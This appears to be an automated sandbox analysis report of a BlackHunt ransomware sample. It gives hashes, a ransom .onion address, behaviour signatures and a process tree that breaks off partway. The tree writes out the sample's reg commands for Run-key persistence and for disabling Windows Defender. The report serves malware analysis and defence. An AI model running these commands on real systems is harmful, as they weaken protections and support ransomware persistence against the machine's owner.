Analysis
-
max time kernel
5s -
max time network
99s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 22:56
Static task
static1
Behavioral task
behavioral1
Sample
302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe
Resource
win10v2004-20231215-en
General
-
Target
302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe
-
Size
707KB
-
MD5
abd01c4e46463272ba9cabdca33774f6
-
SHA1
e7c03db020f57de0f9a509831ae5575e3a045c8e
-
SHA256
302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a
-
SHA512
0df4bc9a2a5db42b34ddd1f84229a06c9e1c5325a094e168f8a3f66e93d344c4f76eb9bbf75ce612f910c6b03878933bda3906558bc0685c765947ff6270e627
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1w8Jvnh:6uaTmkZJ+naie5OTamgEoKxLWTth
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 10168 fsutil.exe 15792 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 15440 wevtutil.exe 16136 wevtutil.exe 16248 wevtutil.exe 15980 wevtutil.exe 15500 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 8968 bcdedit.exe 7480 bcdedit.exe 15812 bcdedit.exe 15916 bcdedit.exe -
Renames multiple (538) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 9588 wbadmin.exe 16396 wbadmin.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\E: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\Y: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\I: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\O: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\G: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\Z: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\J: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\K: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\V: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\X: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\W: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\R: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\T: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\A: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\S: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\H: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\L: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\N: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\M: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\U: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\P: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\B: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jre-1.8\lib\psfontj2d.properties 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#BlackHunt_Private.key 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\MSBuild\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#BlackHunt_Private.key 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jre-1.8\lib\images\cursors\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jopt-simple.md 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\public_suffix.md 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#BlackHunt_Private.key 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\glib.md 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_ko.properties 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jre-1.8\lib\cmm\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jre-1.8\lib\management\#BlackHunt_Private.key 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jre-1.8\bin\#BlackHunt_Private.key 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jre-1.8\bin\plugin2\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\ant-javafx.jar 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\az\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\directshow.md 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\jopt-simple.md 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\jaccess.jar 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\ext\#BlackHunt_Private.key 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jdk-1.8\include\win32\bridge\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jdk-1.8\jre\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\sound.properties 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\7-Zip\#BlackHunt_Private.key 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\relaxngcc.md 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jfr\profile.jfc 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\UnregisterConfirm.au 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\server\Xusage.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\webkit.md 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\management\jmxremote.access 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\dotnet\swidtag\Microsoft Windows Desktop Runtime - 8.0.0 (x64).swidtag 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\cldrdata.jar 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\rt.jar 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\webkit.md 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\#BlackHunt_Private.key 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\am\#BlackHunt_Private.key 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\server\classes.jsa 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\7-Zip\Lang\en.ttt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\blacklist 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\#BlackHunt_Private.key 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\local_policy.jar 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\sRGB.pf 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7372 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7768 vssadmin.exe 7184 vssadmin.exe 10136 vssadmin.exe 2604 vssadmin.exe 2852 vssadmin.exe 7476 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 17008 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" Conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon Conhost.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 17068 PING.EXE -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Token: SeRestorePrivilege 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Token: SeBackupPrivilege 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Token: SeTakeOwnershipPrivilege 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Token: SeAuditPrivilege 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Token: SeSecurityPrivilege 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Token: SeIncBasePriorityPrivilege 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3920 wrote to memory of 4824 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 90 PID 3920 wrote to memory of 4824 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 90 PID 3920 wrote to memory of 4324 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 92 PID 3920 wrote to memory of 4324 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 92 PID 3920 wrote to memory of 3040 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 94 PID 3920 wrote to memory of 3040 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 94 PID 3920 wrote to memory of 4036 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 100 PID 3920 wrote to memory of 4036 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 100 PID 3920 wrote to memory of 3496 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 172 PID 3920 wrote to memory of 3496 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 172 PID 4824 wrote to memory of 3152 4824 cmd.exe 98 PID 4824 wrote to memory of 3152 4824 cmd.exe 98 PID 3920 wrote to memory of 2384 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 101 PID 3920 wrote to memory of 2384 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 101 PID 3920 wrote to memory of 2368 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 113 PID 3920 wrote to memory of 2368 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 113 PID 3040 wrote to memory of 2824 3040 cmd.exe 103 PID 3040 wrote to memory of 2824 3040 cmd.exe 103 PID 3920 wrote to memory of 1908 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 104 PID 3920 wrote to memory of 1908 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 104 PID 3920 wrote to memory of 3996 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 112 PID 3920 wrote to memory of 3996 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 112 PID 3920 wrote to memory of 4080 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 106 PID 3920 wrote to memory of 4080 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 106 PID 3496 wrote to memory of 1584 3496 Conhost.exe 109 PID 3496 wrote to memory of 1584 3496 Conhost.exe 109 PID 4324 wrote to memory of 1400 4324 cmd.exe 169 PID 4324 wrote to memory of 1400 4324 cmd.exe 169 PID 3920 wrote to memory of 3644 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 114 PID 3920 wrote to memory of 3644 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 114 PID 2384 wrote to memory of 2320 2384 cmd.exe 118 PID 2384 wrote to memory of 2320 2384 cmd.exe 118 PID 3920 wrote to memory of 4876 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 116 PID 3920 wrote to memory of 4876 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 116 PID 4080 wrote to memory of 3600 4080 cmd.exe 119 PID 4080 wrote to memory of 3600 4080 cmd.exe 119 PID 3920 wrote to memory of 1016 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 120 PID 3920 wrote to memory of 1016 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 120 PID 4036 wrote to memory of 656 4036 cmd.exe 176 PID 4036 wrote to memory of 656 4036 cmd.exe 176 PID 1908 wrote to memory of 4556 1908 cmd.exe 123 PID 1908 wrote to memory of 4556 1908 cmd.exe 123 PID 2368 wrote to memory of 3636 2368 cmd.exe 127 PID 2368 wrote to memory of 3636 2368 cmd.exe 127 PID 3920 wrote to memory of 1116 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 126 PID 3920 wrote to memory of 1116 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 126 PID 3644 wrote to memory of 1752 3644 cmd.exe 183 PID 3644 wrote to memory of 1752 3644 cmd.exe 183 PID 3920 wrote to memory of 4448 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 128 PID 3920 wrote to memory of 4448 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 128 PID 3920 wrote to memory of 1220 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 130 PID 3920 wrote to memory of 1220 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 130 PID 3920 wrote to memory of 2528 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 134 PID 3920 wrote to memory of 2528 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 134 PID 4876 wrote to memory of 2644 4876 cmd.exe 186 PID 4876 wrote to memory of 2644 4876 cmd.exe 186 PID 3920 wrote to memory of 4696 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 131 PID 3920 wrote to memory of 4696 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 131 PID 3996 wrote to memory of 1412 3996 cmd.exe 138 PID 3996 wrote to memory of 1412 3996 cmd.exe 138 PID 3920 wrote to memory of 1404 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 137 PID 3920 wrote to memory of 1404 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 137 PID 3920 wrote to memory of 3380 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 140 PID 3920 wrote to memory of 3380 3920 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 140 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe"C:\Users\Admin\AppData\Local\Temp\302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3920 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:3152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:1400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:3496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
